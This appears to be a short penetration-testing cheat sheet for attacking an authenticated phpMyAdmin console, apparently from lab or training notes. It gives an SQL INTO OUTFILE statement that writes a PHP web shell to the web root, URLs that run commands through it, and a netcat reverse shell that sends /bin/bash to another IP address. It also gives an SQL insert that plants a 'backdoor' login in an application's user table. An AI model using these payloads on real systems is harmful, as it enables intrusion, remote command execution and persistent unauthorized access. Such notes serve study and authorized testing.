phpmyadmin
(Authenticated)
[1]Navigate to Server → SQL , add and save this string
SELECT "<?php system($_GET['cmd']); ?>" into outfile “/var/www/html/backdoor.php”
[2]Command injection
http://192.168.101.108/backdoor.php?cmd=whoami
[3]Revshell
http://192.168.101.108/backdoor.php?cmd=nc 192.168.101.95 4444 -e /bin/bash
#Adding a new user (Authenticated)
Once you get access to phpmyadmin console,click on users and find username passwords.
Add a new user for privilege escalation
Click on SQL tab to inject SQL
insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");
adding new user and password with “backdoor” creds
select * from webappdb.users
Now that you have created a new user you can login with backdoor:backdoor
http://192.168.177.10/login.php (Tom's taco truck)
Last updated